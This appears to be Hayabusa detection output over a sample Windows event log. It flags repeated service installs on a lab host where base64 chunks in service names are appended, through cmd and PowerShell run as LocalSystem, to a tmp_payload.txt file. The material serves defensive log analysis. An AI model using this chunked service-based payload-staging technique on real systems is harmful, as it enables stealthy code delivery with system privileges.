MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:52.841 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" 2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: 
